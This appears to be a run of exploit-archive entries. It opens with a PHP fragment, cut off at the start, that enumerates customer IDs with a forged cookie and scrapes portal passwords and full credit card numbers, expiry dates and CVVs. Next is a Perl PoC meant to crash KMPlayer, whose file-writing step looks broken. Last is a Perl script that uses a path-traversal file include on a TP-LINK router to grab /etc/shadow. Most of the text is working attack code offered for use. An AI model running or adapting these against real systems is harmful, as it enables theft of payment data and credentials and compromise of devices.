$url2='customers_edit.php?currentpage=customers';
$url.=$url2;
for ($id_pod; $id_pod <= $id_end; $id_pod++) { $cookie = 'cust_verify=' . urlencode('#pakamera') . '; cust_id=' .
urlencode($id_pod);
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_HEADER, 1); curl_setopt($ch, CURLOPT_COOKIE, $cookie); curl_setopt($ch, CURLOPT_POST, 1);//przesylamy metod. post curl_setopt($ch, CURLOPT_POSTFIELDS, "customersid=$id_pod"); //dane do wyslania curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); $intro = curl_exec($ch); curl_close($ch);




$regex_login = '#\<td title="Customer username for 
portal"\>(.+?)\<\/td\>#s';
preg_match($regex_login, $intro, $login);




$regex_pass = '#\<td title="Customer password for portal"><input
type="password" name="password" required="1" maxlength="45"
value="(.+?)"\>\<\/td\>#s';
preg_match($regex_pass, $intro, $pass);




$regex_ccnum = '#\<td title="Customer cc number"><input type="text"
name="ccnumber" maxlength="20" value="(.+?)"\>\<\/td\>#s';
preg_match($regex_ccnum, $intro, $ccnum);




$regex_ccexpire = '#\<td title="Customer cc expire"><input type="text"
name="ccexpire" maxlength="8" value="(.+?)"\>\<\/td\>#s';
preg_match($regex_ccexpire, $intro, $ccexpire);




$regex_cccvv = '#\<td title="Customer credit card CVV"><input
type="text" name="cccvv" maxlength="6" value="(.+?)"\>\<\/td\>#s';
preg_match($regex_cccvv, $intro, $cccvv);








	$test = explode(" ",$login[1]);








	if(trim($test[0])!='</td>')
	{
	echo 'ID:'.$id_pod."\n";
	echo 'LOGIN:'.$login[1]."\n";
	echo 'Password:'.$pass[1]."\n";
	echo 'CCnumber:'.$ccnum[1]."\n";
	echo 'CCexpire:'.$ccexpire[1]."\n";
	echo 'CCCVV:'.$cccvv[1]."\n\n";
	}
}




?>
            
source: https://www.securityfocus.com/bid/56322/info

KMPlayer is prone to a local denial-of-service vulnerability.

An local attacker can exploit this issue to crash the affected application, denying service to legitimate users.

KMPlayer 3.0.0.1440 is vulnerable; other versions may also be affected. 

#!/usr/bin/perl
#Title : KmPlayer v3.0.0.1440 Local Crash PoC
#Discovered By : Am!r
#Home : http://IrIsT.Ir/forum/
#tested : XP
#TNX : Alireza , C0dex , B3hz4d

my $po="\x46\x02\x00\x00";

open(C, ">:raw", "poc.avi");

print $po;

close(C);
            
source: https://www.securityfocus.com/bid/56320/info

TP-LINK TL-WR841N router is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input.

An attacker can exploit this vulnerability to view files and execute local scripts in the context of the affected device. This may aid in further attacks.

TP-LINK TL-WR841N 3.13.9 Build 120201 Rel.54965n is vulnerable; other versions may also be affected. 

#TP-LINK TL-WR841N Shadow file grabber#

#built by Pulse matan () madsec co il#

#enjoy#

 

use LWP::UserAgent;

$host = $ARGV[0];

chomp($host);

if($host !~ /http:\/\//) { $host = "http://$host";; };

 

my $ua = LWP::UserAgent->new;

$ua->timeout(30);

$lfi = "/help/../../../../../../../../etc/shadow";

$url = $host.$lfi;

$request = HTTP::Request->new('GET', $url);

$response = $ua->request($request);

my $html = $response->content;          

if($html =~ /root/) {

print "root$' \n" ;

}